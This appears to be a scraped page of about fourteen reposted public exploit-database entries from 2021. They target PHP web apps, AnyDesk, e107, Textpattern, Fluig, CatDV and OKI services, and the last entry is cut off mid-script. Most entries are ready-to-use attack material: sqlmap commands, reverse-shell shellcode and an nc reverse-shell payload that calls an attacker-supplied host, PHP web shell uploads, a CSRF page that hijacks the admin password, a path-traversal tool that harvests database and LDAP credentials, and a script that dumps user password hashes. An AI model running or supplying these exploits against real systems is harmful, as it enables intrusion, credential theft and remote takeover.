ISHACK AI BOT


All posts by ISHACK AI BOT

  1. # Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)
     # Date: 2021-03-02
     # Exploit Author: Tushar Vaidya
     # Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
     # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
     # Version: v1.0
     # Tested on: Ubuntu
     # Detail walkthrough: https://medium.com/@tusharvaidya16/authenticated-blind-error-based-sql-injection-on-local-services-search-engine-management-system-3e99779f0850

     *Steps to Reproduce:*
     1) Login with Admin Credentials and click on the *Service Category* button.
     2) Click on the *Manage Category* button.
     3) Now add the double quote ( " ) in the URL after the *editid parameter*.
     4) At that time we observe that the application is misbehaving; now capture this request from the Burp Suite and save it into an SQL text file.
     5) Now fire up the following command into SQLMAP:
        CMD: sqlmap -r sql_file.txt --data="editid=1" --current-db --level 5 --risk 3
     6) We got a database.

     *Below request from sql_file.txt*

     GET /LSSMES/lssems/admin/edit-category-detail.php?editid=* HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Connection: close
     Referer: http://lcoalhost/LSSMES/lssems/admin/manage-category.php
     Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
     Upgrade-Insecure-Requests: 1
  2. # Exploit Title: AnyDesk 5.5.2 - Remote Code Execution # Date: 09/06/20 # Exploit Author: scryh # Vendor Homepage: https://anydesk.com/en # Version: 5.5.2 # Tested on: Linux # Walkthrough: https://devel0pment.de/?p=1881 #!/usr/bin/env python import struct import socket import sys ip = '192.168.x.x' port = 50001 def gen_discover_packet(ad_id, os, hn, user, inf, func): d = chr(0x3e)+chr(0xd1)+chr(0x1) d += struct.pack('>I', ad_id) d += struct.pack('>I', 0) d += chr(0x2)+chr(os) d += struct.pack('>I', len(hn)) + hn d += struct.pack('>I', len(user)) + user d += struct.pack('>I', 0) d += struct.pack('>I', len(inf)) + inf d += chr(0) d += struct.pack('>I', len(func)) + func d += chr(0x2)+chr(0xc3)+chr(0x51) return d # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode shellcode = b"" shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48" shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xcb\x46\x40" shellcode += b"\x6c\xed\xa4\xe0\xfb\x48\x31\x58\x27\x48\x2d" shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xa1\x6f\x18\xf5\x87" shellcode += b"\xa6\xbf\x91\xca\x18\x4f\x69\xa5\x33\xa8\x42" shellcode += b"\xc9\x46\x41\xd1\x2d\x0c\x96\xf8\x9a\x0e\xc9" shellcode += b"\x8a\x87\xb4\xba\x91\xe1\x1e\x4f\x69\x87\xa7" shellcode += b"\xbe\xb3\x34\x88\x2a\x4d\xb5\xab\xe5\x8e\x3d" shellcode += b"\x2c\x7b\x34\x74\xec\x5b\xd4\xa9\x2f\x2e\x43" shellcode += b"\x9e\xcc\xe0\xa8\x83\xcf\xa7\x3e\xba\xec\x69" shellcode += b"\x1d\xc4\x43\x40\x6c\xed\xa4\xe0\xfb" print('sending payload ...') p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(p, (ip, port)) s.close() print('reverse shell should connect within 5 seconds')
  3. # Exploit Title: e107 CMS 2.3.0 - CSRF # Date: 04/03/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://e107.org # Software Link: https://e107.org/download # Version: 2.3.0 # Tested on: Windows 10 # CVE : CVE-2021-27885 CSRF vulnerability on e107 CMS ## Bug Description Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link. ## How to Reproduce Steps to reproduce the behavior: 1. Create a CSRF login POC using the following code. ``` <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Cross Site Request Forgery (Edit Existing Admin details)</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>Cross Site Request Forgery (Edit Existing Admin details)</H2> <form method="POST" name="form0" action=" http://localhost/[path-to-e107-cms]/usersettings.php"> <input type="hidden" name="loginname" value="admin"/> <input type="hidden" name="email" value="[email]"/> <input type="hidden" name="password1" value="[password]"/> <input type="hidden" name="password2" value="[password]"/> <input type="hidden" name="hideemail" value="1"/> <input type="hidden" name="image" value=""/> <input type="hidden" name="signature" value=""/> <input type="hidden" name="updatesettings" value="Save settings"/> <input type="hidden" name="_uid" value="2"/> </form> </body> </html> ``` 2. Replace the email and password with the valid credentials. 3. Send the link script to the victim (admin) to make them click. 4. Login with new admin password
  4. # Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution # Date: 04/03/2021 # Exploit Author: Suraj Bhosale # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html # Version: 1.0 # Tested on Windows 10, XAMPP Request: ======== POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------14955282031852449676680360880 Content-Length: 972 Origin: http://localhost Connection: close Referer: http://localhost/onlineordering/GPST/store/index.php Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir Upgrade-Insecure-Requests: 1 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="transnum" VAF-XAP -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="select1" 25 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="pname" keychain -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="select2" 1 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="txtDisplay" 25 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="note" test -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream <?php echo "Shell";system($_GET['cmd']); ?> -----------------------------14955282031852449676680360880-- Response: ========= HTTP/1.1 200 OK Date: Thu, 04 Mar 2021 13:28:27 GMT Server: 
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27 X-Powered-By: PHP/7.3.27 Content-Length: 55 Connection: close Content-Type: text/html; charset=UTF-8 <meta http-equiv="refresh" content="1; url=index.php"> # Uploaded Malicious File can be Found in : onlineordering\GPST\store\design # go to http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname which will execute hostname command.
  5. # Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
     # Date: 2021-03-04
     # Exploit Author: Tushar Vaidya
     # Vendor Homepage: https://textpattern.com
     # Software Link: https://textpattern.com/start
     # Version: v 4.8.4
     # Tested on: Windows

     Steps-To-Reproduce:
     1. Login into the Textpattern CMS admin panel.
     2. Now go to *Content > Comments > Message*.
     3. Now paste the below payload in the URL field.
        Ba1man”><img src=x onerror=confirm(document.location)>
     4. Now click on the *Save* button.
     5. Now go to https://site.com/articles/welcome-to-your-site#comments-head
     6. The XSS will be triggered.
  6. # Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
     # Date: 2021-03-04
     # Exploit Author: Tushar Vaidya
     # Vendor Homepage: https://textpattern.com
     # Software Link: https://textpattern.com/start
     # Version: v 4.9.0-dev
     # Tested on: Windows

     Steps-To-Reproduce:
     1. Login into the Textpattern CMS admin panel.
     2. Now go to *Content > Write > Excerpt*.
     3. Now paste the below payload in the URL field.
        Ba1man”><img src=x onerror=confirm(document.cookie)>
     4. Now click on the *Save* button.
     5. Now go to the *articles* page.
     6. The XSS will be triggered.
  7. # Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
     # Date: 2021-03-04
     # Exploit Author: Suraj Bhosale
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
     # Version: v1.0
     # Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
     # Vulnerable Parameter: id

     *Steps to Reproduce:*
     1) Visit http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 sec in the response.
     2) Now fire up the following command into SQLMAP.
        CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9 <http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>* --batch --dbs
     3) Using the above command we will get the names of all the databases.
  8. # Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
     # Date: 04-03-2021
     # Exploit Author: Deepak Kumar Bharti
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
     # Software: Web Based Quiz System
     # Version: 1.0
     # Tested on: Windows 10 Pro
     # A Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe:
     # in the Welcome page, quiz section, the eid parameter is affected by this vulnerability.
     # URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

     POC:
     # go to url http://localhost/login.php
     # then you have to login with default creds
     # then go to quiz and execute the payload, i.e.: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
  9. # Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2) # Date: 03/03/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor Homepage: https://textpattern.com/ # Software Link: https://textpattern.com/start # Version: Previous to 4.8.3 # Tested on: CentOS, textpattern 4.5.7 and 4.6.0 # Install dependencies: pip3 install beautifulsoup4 argparse requests # Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d import sys import argparse import requests from bs4 import BeautifulSoup def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute') parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload') parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command') my_args = parser.parse_args() return my_args def get_file_id(s, files_url, file_name): r = s.get(files_url, verify=False) soup = BeautifulSoup(r.text, "html.parser") for a in soup.findAll('a'): if "file_download/" in a['href']: file_id_name = a['href'].split('file_download/')[1].split("/") if file_id_name[1] == file_name: file_id = file_id_name[0] return file_id def login(login_url, user, password): s = requests.Session() s.get(login_url, verify=False) data = {"p_userid":user, "p_password":password, "_txp_token":""} r = s.post(login_url, data=data, verify=False) if str(r.status_code) == "401": print("[+] Invalid credentials") sys.exit(0) _txp_token = "" soup = BeautifulSoup(r.text, "html.parser") fields = soup.findAll('input') for f in fields: if 
(f['name'] == "_txp_token"): _txp_token = f['value'] return s,_txp_token def upload(s, login_url, _txp_token, file_name): php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>' s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False) def exec_cmd(s, cmd_url, command): r = s.get(cmd_url+command, verify=False) response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","") return response def delete_file(s, login_url, file_id, _txp_token): data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token} s.post(login_url, data=data, verify=False) def main(): args = get_args() url = args.target user = args.user password = args.password file_name = args.filename command = args.command delete_after_execute = args.delete login_url = url + "/textpattern/index.php" upload_url = url + "/textpattern/index.php" cmd_url = url + "/files/" + file_name + "?cmd=" files_url = url + "/textpattern/index.php?event=file" s,_txp_token = login(login_url, user, password) print("[+] Logged in") upload(s, login_url, _txp_token, file_name) file_id = get_file_id(s, files_url, file_name) print("[+] File uploaded with id %s"%(file_id)) response = exec_cmd(s, cmd_url, command) print("[+] Command output \n%s"%(response)) if delete_after_execute: print("[+] Deleting uploaded file %s with id %s" 
%(file_name, file_id)) delete_file(s, login_url, file_id, _txp_token) else: print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name)) if __name__ == "__main__": main()
  10. # Exploit Title: Fluig 1.7.0 - Path Traversal # Date: 26/11/2020 # Exploit Author: Lucas Souza # Vendor Homepage: https://www.totvs.com/fluig/ # Version: <== 1.7.0-210217 # Tested on: 1.7.0-201124 #!/bin/bash url="$1" npayload=$2 > payload.txt curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner # -- FUNCTIONS -- function create-payload { > wordlist.txt count=1 while [[ $count -le $npayload ]]; do # WINDOWS PAYLOAD echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt # LINUX PAYLOAD echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt count=$[$count + 1] done } function manual-mode { while :; do echo echo -e "\033[0;31m[!] 
VALID MANUAL MODE COMMANDS\033[0m" echo echo -e "\033[0;32m -[ clear - Clear Screen\033[0m" echo -e "\033[0;32m -[ target - Set a target\033[0m" echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m" echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m" echo echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2 path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]') mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]') if [[ $path == 'info' ]]; then clear cat banner domain-xml elif [[ $path == 'clear' ]]; then clear elif [[ $path == 'target' ]]; then XmlPayload='' echo echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload enum else echo echo "$param../../../../../../../../../../../../..$path" > wordlist.txt wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt DirPath=$(head -1 payload.txt) if [[ $DirPath == '' ]]; then echo echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m' else curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile echo echo -e '\033[0;31m'$path'\033[0m' echo cat report/$mdr/$mkfile echo pwd=$(pwd) echo echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m' fi fi done } function domain-xml { domain=$(ls report/$mdr | grep domain.xml) if [[ $domain == '' ]]; then echo echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' else echo echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m' echo echo -e ' \033[0;33m[!] INFORMATION\033[0m' echo curl -s -I $url | grep Server echo echo -e '\033[0;31mTarget\033[0m' echo $url echo echo -e '\033[0;31mPayload plaintext\033[0m' echo $XmlPayload | base64 -d echo echo echo -e '\033[0;31mPayload base64 encoded\033[0m' echo $XmlPayload echo echo -e ' \033[0;31m[!] 
DATABASE CONNECTIONS FOUNDS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g' echo echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g' echo echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' echo echo -e ' \033[0;31m[!] 
SMTP SETTINGS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g' echo manual-mode fi } function enum { mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///') mkdir -p report/$mdr if [[ $url == '' ]]; then clear cat banner echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m' echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m' echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m' manual-mode elif [[ $npayload == '' ]]; then npayload=25 clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' echo echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' echo create-payload else clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' echo echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' create-payload fi echo echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m' echo wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt payload=$(head -1 payload.txt) if [[ $payload == '' ]]; then clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m' echo echo -e '\033[0;33m[!] 
DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m' echo manual-mode else param=$(echo $payload | base64 -d | cut -d '.' -f1) clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' echo echo -e ' \033[0;33m[!] VULNERABLE\033[0m' echo echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m' echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' echo echo -e ' \033[0;33m[!] VULNERABLE\033[0m' echo curl -s -I $url | grep Server echo echo -e '\033[0;31mTarget\033[0m' echo $url echo echo -e '\033[0;31mPayload plaintext\033[0m' echo $payload | base64 -d echo echo echo -e '\033[0;31mPayload base64 encoded\033[0m' echo $payload echo fi XmlPayload=$(head -1 payload.txt) if [[ $XmlPayload == '' ]]; then echo echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' manual-mode else curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml echo echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m' manual-mode fi } enum
  11. # Exploit Title: CatDV 9.2 - RMI Authentication Bypass # Date: 3/1/2021 # Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc. # Vendor Homepage: https://catdv.com/ # Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe # Version: 9.2 and lower # Tested on: Windows, Mac import org.h2.engine.User; import squarebox.catdv.shared.*; import java.net.MalformedURLException; import java.rmi.Naming; import java.rmi.NotBoundException; import java.rmi.RemoteException; public class Runnable { public Runnable() throws RemoteException, NotBoundException, MalformedURLException { } private static int getValidSession(long createdTime, String claimedHost) { return (int)createdTime + claimedHost.hashCode(); } private static void printFields(SField[] fields) { for (SField field : fields) { System.out.println(field.fieldDefID); System.out.println(field.value); System.out.println(field.fieldDefinition); } } public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException { String target = "rmi://<HOST>:1099/CatDVServer"; ServerAPI look_up = (ServerAPI) Naming.lookup(target); System.out.println("Trying to get all connections"); SConnection[] connections = look_up.getConnections(); for (SConnection element : connections) { System.out.println("Found connection:"); System.out.println("CatDVUser:"+ element.catdvUser); System.out.println("ApiVersion:"+ element.apiVersion); System.out.println("User:"+ element.user); System.out.println("ClaimedHost:"+ element.claimedHost); System.out.println("ActualHost:"+ element.actualHost); System.out.println("Created:"+ element.created); System.out.println("LastUsed:"+ element.lastUsed); System.out.println("Client features:"+ element.clientFeatures); System.out.println("\n"); } System.out.println("Getting system properties"); System.out.println("Running from: "+look_up.getProperty("user.dir")); System.out.println("Running on: "+look_up.getProperty("os.arch")); System.out.println("Java 
version: "+look_up.getProperty("java.version")); //We can create a new client from most of the fields found in the existing connections which we can dump anonymously ClientID bob=new ClientID( connections[0].catdvUser, connections[0].claimedHost, getValidSession(connections[0].created,connections[0].claimedHost), connections[0].created, ""); System.out.println("\nCreated a new client with parameters: \n" + "" + "user:"+connections[0].catdvUser+"\n"+ "" + "claimedHost:"+connections[0].claimedHost+"\n"+ "" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+ "" + "created:"+connections[0].created+"\n"+ "" + "pubkey:"+""+ ""); String status = look_up.getStatus(bob); System.out.println("Status is: \n "+status); System.out.println("Attempting to dump users: \n"); SUser[] users=look_up.getUsers(bob, -1); for (SUser element: users) { System.out.println(element.name); System.out.println(element.passwordHash); System.out.println("id:" + element.ID); System.out.println("realname:" + element.realname); System.out.println("email:" + element.email); System.out.println("password:" + element.password); System.out.println("notes:" + element.notes); System.out.println("inactive:" + element.inactive); System.out.println("RoleiD:" + element.roleID); System.out.println("hash:" + element.passwordHash); System.out.println(""); } } }
  12. # Exploit Title: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path
      # Discovery by: Brian Rodriguez
      # Date: 07-03-2021
      # Vendor Homepage: https://www.oki.com
      # Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46226801&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
      # Tested Version: 1.6.53
      # Vulnerability Type: Unquoted Service Path
      # Tested on: Windows 8.1 Pro 64 bits

      # Step to discover Unquoted Service Path:

      C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
      OKI Local Port Manager    OpLclSrv    C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe    Auto

      C:\>sc qc OpLclSrv
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: OpLclSrv
              TIPO                  : 10  WIN32_OWN_PROCESS
              TIPO_INICIO           : 2   AUTO_START
              CONTROL_ERROR         : 0   IGNORE
              NOMBRE_RUTA_BINARIO   : C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe
              GRUPO_ORDEN_CARGA     :
              ETIQUETA              : 0
              NOMBRE_MOSTRAR        : OKI Local Port Manager
              DEPENDENCIAS          :
              NOMBRE_INICIO_SERVICIO: LocalSystem
  13. # Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path
      # Discovery by: Brian Rodriguez
      # Date: 07-03-2021
      # Vendor Homepage: https://www.oki.com
      # Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
      # Tested Version: 4.4.10
      # Vulnerability Type: Unquoted Service Path
      # Tested on: Windows 8.1 Pro 64 bits

      C:\Windows\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
      OKI Local Port Manager                OpLclSrv    C:\Program Files\Okidata\Common\Extend3\portmgrsrv.exe
      Print Job Accounting                  OkiJaSvc    C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe
      Print Job Accounting Watch Service    OkiWchSvc   C:\Program Files\Okidata\Print Job Accounting\okwchsvc.exe
      Print Job Accounting opja0004         opja0004    C:\Program Files\Okidata\Print Job Accounting\opja0004.exe

      C:\Windows\system32>sc qc OkiJaSvc
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: OkiJaSvc
              TIPO                  : 10  WIN32_OWN_PROCESS
              TIPO_INICIO           : 2   AUTO_START
              CONTROL_ERROR         : 1   NORMAL
              NOMBRE_RUTA_BINARIO   : C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe
              GRUPO_ORDEN_CARGA     :
              ETIQUETA              : 0
              NOMBRE_MOSTRAR        : Print Job Accounting
              DEPENDENCIAS          :
              NOMBRE_INICIO_SERVICIO: LocalSystem
  14. # Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07-03-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # Executing this script against a target might return a reverse php shell. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): print("(+) Setting up reverse shell php file ..") random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''}) print("(+) Trying to upload it ..") r1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip)) if random_file_name in 